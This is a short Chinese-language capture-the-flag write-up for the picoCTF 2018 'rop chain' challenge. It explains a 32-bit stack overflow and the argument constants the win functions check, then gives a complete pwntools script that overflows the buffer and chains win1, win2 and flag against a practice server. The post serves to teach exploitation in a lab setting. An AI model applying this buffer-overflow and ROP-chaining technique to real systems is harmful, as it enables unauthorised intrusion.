picoctf_2018_rop chain

先进行检查 32位
在这里插入图片描述打开ida查看一下 vuln 函数存在溢出可以利用
在这里插入图片描述又看到函数表有flag函数 win1 win2 和a1 存在条件 需要控制这3个参数变量
在这里插入图片描述
注意:0xBAAAAAAD是-1163220307对应的16进制的补码作为win_function2函数的参数
下面的 0xDEADBAAD是-559039827对应的16进制的补码作为flag函数的参数(我都已经在ida中转化)

之后又看到win1 win2
在这里插入图片描述在这里插入图片描述最后写下脚本

from pwn import*
from LibcSearcher import*

p=remote('node3.buuoj.cn',25328)
win1=0x80485CB
win2=0x80485D8
flag=0x804862B
payload='a'*(0x18+4)+p32(win1)+p32(win2)+p32(flag)+p32(0xBAAAAAAD)+p32(0xDEADBAAD)
p.sendline(payload)
p.interactive()

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值